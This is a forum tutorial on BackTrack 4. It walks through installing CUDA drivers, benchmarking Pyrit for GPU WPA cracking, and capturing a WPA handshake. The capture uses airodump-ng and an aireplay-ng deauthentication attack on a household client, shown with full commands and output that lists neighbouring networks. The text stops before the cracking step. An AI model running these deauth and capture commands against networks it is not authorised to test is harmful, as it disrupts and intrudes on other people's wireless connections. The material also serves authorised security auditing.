OK so here we are with fresh new release and people lets be honest we want to see some thing new. Well this is one of bt4's new exiting features.

WPA hash Table Generation using CUDA/nvida GPU power.

First thing to do is check if your card is supported for this technology http://en.wikipedia.org/wiki/CUDA#Supported_GPUs

So lets get started....

I'm going to try to assume that if your reading this you have no clue what your doing so I will try to go from A -Z on this.

So lets boot our disk and when we get to the framebuffer console prompt (thats before you startx) we are going to install the nvidia kernel module.
Code:
root@bt:~# cd /opt/cuda/
root@bt:/opt/cuda# ls
CUDA_INSTALL  cuda-set-env.sh  nv_20090130-1_i386.deb
root@bt:/opt/cuda# bash CUDA_INSTALL
You will get some output and then you will be asked to overwrite your current xorg.conf. Take the default here which is no.
next lets install the driver
Code:
root@bt:~# modprobe nvidia
root@bt:~# depmod -a
ok so thats done. Now since we've totally borked our xorg.conf we should generate a new one.
Code:
root@bt:~# X -configure
That will save the new one in /root and we will have to copy it over by hand
Code:
root@bt:~# cp xorg.conf.new  /etc/X11/xorg.conf
At this point we should be able to either startx or use the new bt4-crystal window manager. (shameless plug for me and j0rgan here)

OK so if every thing went well your are looking at your desktop.

Now before we get to cracking pyrit has a benchmark utility we can use to see if we are good to go.
Code:
root@bt:/pentest/password/pyrit# python pyrit.py benchmark
The Pyrit commandline-client (C) 2008 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3

The ESSID-blobspace seems to be empty; you should create an ESSID...
Available cores: 'Standard CPU', 'Nvidia CUDA'
Testing CPU-only core 'Standard CPU' (4 CPUs)...  1294.58 PMKs/s

Testing GPU core 'Nvidia CUDA' (Device 'GeForce 8800 GT')...  5409.43 PMKs/s
As you can see my 8800gt is roughly 5 times faster that my Q6600 quad core chip running at 3.6 GHz

OK swell, so that works. Now what we need is a .cap file. I'm assuming every one can do this but I will show it anyway.
Code:
root@bt:~# ifconfig wlan0 up
root@bt:~# airmon-ng start wlan0
root@bt:~#airodump-ng -w cudacapture mon0
ok so lets do a little scan of my house.


As you can see I have 2 dd-wrt routers on at the moment and my wife is connected to ddwrt1 feeding her new facebook addiction.
Lets deauth her a$$
Code:
root@bt:~# aireplay-ng -0 10 -a 00:1d:7e:f0:a5:8f -c 00:13:02:a7:dd:53 mon0
01:13:28  Waiting for beacon frame (BSSID: 00:1D:7E:F0:A5:8F) on channel 6
01:13:29  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [25|68 ACKs]
01:13:30  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 3|63 ACKs]
01:13:31  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:32  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:33  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|63 ACKs]
01:13:34  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:35  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
01:13:36  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [ 5|64 ACKs]
01:13:37  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [11|64 ACKs]
01:13:38  Sending 64 directed DeAuth. STMAC: [00:13:02:A7:DD:53] [64|64 ACKs]
Now lets check for success
Code:
root@bt:~# aircrack-ng cudacapture-01.cap
Opening cudacapture-01.cap
Read 5612 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1D:7E:F0:A5:8F  ddwrt1                    WPA (1 handshake)
   2  00:1D:7E:64:9A:7C  ddwrt2                    WPA (0 handshake)
   3  00:21:29:84:11:FD  CookNet                   WEP (34 IVs)
   4  00:0C:41:3E:2D:66  linksys                   None (192.168.1.1)
   5  00:12:0E:7B:02:78  WEST7359                  No data - WEP or WPA
   6  00:1A:70:83:B0:1C  linksys                   None (0.0.0.0)
   7  00:13:46:44:A5:CE  default                   WEP (11 IVs)
   8  00:14:6C:F6:36:78  CBC                       None (0.0.0.0)
   9  00:06:25:DB:3E:7B  linksys                   None (0.0.0.0)
  10  00:1B:2F:63:7C:50  PawsWithPurpose           No data - WEP or WPA
  11  00:21:29:9A:E6:3C  Bigfoot                   No data - WEP or WPA
  12  00:1C:10:89:16:76  linksys                   None (0.0.0.0)

Index number of target network ?
Looks like we got one.
I'm going to start a new post for part 2